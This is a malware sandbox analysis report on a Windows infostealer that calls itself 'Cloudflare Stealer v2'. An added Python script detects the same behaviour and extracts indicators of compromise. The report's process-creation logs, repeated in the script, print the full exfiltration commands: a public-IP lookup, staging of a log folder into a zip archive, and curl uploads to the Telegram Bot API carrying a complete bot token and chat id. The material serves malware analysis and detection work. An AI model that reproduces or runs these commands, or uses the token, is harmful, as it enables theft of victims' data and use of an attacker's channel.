Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr Address
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr Address
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
Source: C:\Users\user\Desktop\cvf.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\cvf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\cvf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\cvf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\cvf.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: cvf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cvf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cvf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cvf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cvf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cvf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cvf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\skar\Desktop\CloudflareStealer V2\Cloudflare Stealer v2\Release\Cloudflare Stealer v2.pdb9 source: cvf.exe
Source: Binary string: C:\Users\skar\Desktop\CloudflareStealer V2\Cloudflare Stealer v2\Release\Cloudflare Stealer v2.pdb source: cvf.exe
Source: cvf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cvf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cvf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cvf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cvf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\cvf.exe Code function: 0_2_00BC9199 push ecx; ret 0_2_00BC91AC

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6590
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1339
Source: C:\Users\user\Desktop\cvf.exe API coverage: 8.2 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800 Thread sleep count: 6590 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7708 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832 Thread sleep count: 1339 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\cvf.exe Code function: 0_2_00BDE041 FindFirstFileExW,0_2_00BDE041
Source: C:\Users\user\Desktop\cvf.exe Code function: 0_2_00BB22D0 Concurrency::cancel_current_task,FindFirstFileA,CopyFileA,FindNextFileA,CreateDirectoryA,GetLastError,FindClose,SHGetFolderPathA,0_2_00BB22D0
Source: C:\Users\user\Desktop\cvf.exe Code function: 0_2_00BC77E6 FindClose,FindFirstFileExW,GetLastError,0_2_00BC77E6
Source: C:\Users\user\Desktop\cvf.exe Code function: 0_2_00BC783D GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,0_2_00BC783D
Source: curl.exe, 00000008.00000003.1184284536.0000000002DE0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1245496882.0000000003080000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: curl.exe, 0000001E.00000003.1414416949.00000000029C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: curl.exe, 0000000A.00000003.1217366376.0000000003640000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1217555905.0000000003643000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: curl.exe, 00000013.00000003.1277931569.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.1442886383.0000000002A50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\cvf.exe Code function: 0_2_00BC9555 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BC9555
Source: C:\Users\user\Desktop\cvf.exe Code function: 0_2_00BDF1B0 GetProcessHeap,0_2_00BDF1B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\cvf.exe Code function: 0_2_00BC92F8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BC92F8
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC9555 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BC9555
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BC96B1 SetUnhandledExceptionFilter,0_2_00BC96B1
Source: C:\Users\user\Desktop\cvf.exeCode function: 0_2_00BD1899 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BD1899
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe, command line: C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe, command line: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe, command line: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe, command line: C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe, command line: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe, command line: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe, command line: C:\Windows\system32\cmd.exe /c powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe, command line: C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe, command line: C:\Windows\system32\cmd.exe /c curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\nslookup.exe, command line: nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe, command line: findstr Address
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe, command line: findstr /V resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe, command line: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe, command line: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\nslookup.exe, command line: nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe, command line: findstr Address
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe, command line: findstr /V resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe, command line: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe, command line: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, command line: powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe, command line: curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe, command line: curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
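The process-creation evidence above is the whole exfiltration chain in four command lines: a public-IP lookup (OpenDNS answers a query for myip.opendns.com sent to resolver1.opendns.com with the querying client's own address, and the two findstr filters strip everything except that address), a sendMessage call carrying temp_payload.json, a Compress-Archive run that stages the log folder into log.zip, and a sendDocument call that uploads log.zip with the caption "New Log!". The script below is an added example of detection logic written for this page; it is not part of the Joe Sandbox report. It runs those command lines (copied from the report, plus one constructed benign notepad.exe line) through the regexes a Sysmon Event ID 1 / Security 4688 pipeline would use, tags each hit with the tactic it serves, and extracts the bot id, chat_id and uploaded file as IOCs while masking the token secret. The Finding and Iocs types and the regex names are this example's own.

```python
"""Flag the public-IP lookup / Telegram Bot API exfiltration chain in
process-creation telemetry and extract bot id, chat_id and uploaded file."""
import re
from dataclasses import dataclass, field

# Command lines copied verbatim from the "Process created" evidence in this
# report (cmd.exe children of cvf.exe). The final notepad.exe line is
# constructed so the analyser has a benign entry to ignore.
SAMPLE_CMDLINES = [
    r"C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com",
    r'curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json',
    r'''powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"''',
    r'curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"',
    r'curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"',
    r"C:\Windows\system32\notepad.exe C:\Users\user\notes.txt",  # constructed, benign
]

# Telegram Bot API URLs look like https://api.telegram.org/bot<id>:<secret>/<method>;
# the whole "bot<id>:<secret>" path segment is the credential.
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,})/(?P<method>[A-Za-z]+)"
)
CHAT_ID_RE = re.compile(r"chat_id=(?P<chat_id>-?\d*)")
UPLOAD_RE = re.compile(r'document=@(?P<path>[^"\s]+)')
OPENDNS_MYIP_RE = re.compile(r"nslookup\s+myip\.opendns\.com\s+resolver\d*\.opendns\.com", re.I)
ARCHIVE_RE = re.compile(r"Compress-Archive\b.*?-DestinationPath\s+['\"]?(?P<zip>[^'\"\s]+)", re.I)


@dataclass
class Finding:
    tactic: str
    detail: str
    cmdline: str


@dataclass
class Iocs:
    bot_ids: set = field(default_factory=set)
    chat_ids: set = field(default_factory=set)
    methods: set = field(default_factory=set)
    uploads: set = field(default_factory=set)
    archives: set = field(default_factory=set)


def mask_token(bot_id: str, secret: str) -> str:
    """Keep the bot id (a durable IOC) but never write the full secret into a ticket."""
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


def analyse(cmdlines):
    """Return (findings, iocs) for a list of process command lines."""
    findings, iocs = [], Iocs()
    for line in cmdlines:
        if OPENDNS_MYIP_RE.search(line):
            findings.append(Finding("Discovery", "public IP lookup via myip.opendns.com", line))
        m = ARCHIVE_RE.search(line)
        if m:
            iocs.archives.add(m.group("zip"))
            findings.append(Finding("Collection", f"staging archive {m.group('zip')}", line))
        m = TELEGRAM_BOT_RE.search(line)
        if m:
            iocs.bot_ids.add(m.group("bot_id"))
            iocs.methods.add(m.group("method"))
            # sendDocument carries a file upload; everything else is treated as C2 messaging
            tactic = "Exfiltration" if m.group("method") == "sendDocument" else "Command and Control"
            token = mask_token(m.group("bot_id"), m.group("secret"))
            findings.append(Finding(tactic, f"Telegram Bot API {m.group('method')} with token {token}", line))
            c = CHAT_ID_RE.search(line)
            if c and c.group("chat_id"):  # the report shows one call with an empty chat_id
                iocs.chat_ids.add(c.group("chat_id"))
            u = UPLOAD_RE.search(line)
            if u:
                iocs.uploads.add(u.group("path"))
    return findings, iocs


if __name__ == "__main__":
    found, iocs = analyse(SAMPLE_CMDLINES)
    for f in found:
        print(f"[{f.tactic}] {f.detail}")
    print("IOCs:", iocs)
```

Two points a responder would want to keep in mind. First, on the wire only the TLS server name (api.telegram.org) is visible; the bot token and method live in the HTTPS path, so they are recoverable only from endpoint command-line telemetry like the evidence above or from TLS inspection, which is why a host-side rule on the `api.telegram.org/bot<digits>:` pattern is more useful than a network one. Second, the report's evidence shows both an empty `chat_id=` and `chat_id=-4798834305` for the same sendDocument call, so an extractor must tolerate the empty form rather than treating the token as the only identifier; the bot id and the negative group chat id are the durable IOCs, and the secret should be handled as a credential rather than pasted into tickets.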
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BC8FC5 cpuid | 0_2_00BC8FC5
Source: C:\Users\user\Desktop\cvf.exe | Code function: GetLocaleInfoW | 0_2_00BD80CB
Source: C:\Users\user\Desktop\cvf.exe | Code function: EnumSystemLocalesW | 0_2_00BE118E
Source: C:\Users\user\Desktop\cvf.exe | Code function: EnumSystemLocalesW | 0_2_00BE1143
Source: C:\Users\user\Desktop\cvf.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 0_2_00BE12B4
Source: C:\Users\user\Desktop\cvf.exe | Code function: EnumSystemLocalesW | 0_2_00BE1229
Source: C:\Users\user\Desktop\cvf.exe | Code function: GetLocaleInfoEx,FormatMessageA | 0_2_00BC75DE
Source: C:\Users\user\Desktop\cvf.exe | Code function: GetLocaleInfoW | 0_2_00BE1507
Source: C:\Users\user\Desktop\cvf.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 0_2_00BE1630
Source: C:\Users\user\Desktop\cvf.exe | Code function: GetLocaleInfoW | 0_2_00BE1736
Source: C:\Users\user\Desktop\cvf.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 0_2_00BE180C
Source: C:\Users\user\Desktop\cvf.exe | Code function: EnumSystemLocalesW | 0_2_00BD7B9F
Source: C:\Users\user\Desktop\cvf.exe | Code function: GetACP,IsValidCodePage,GetLocaleInfoW | 0_2_00BE0E97
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (21 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
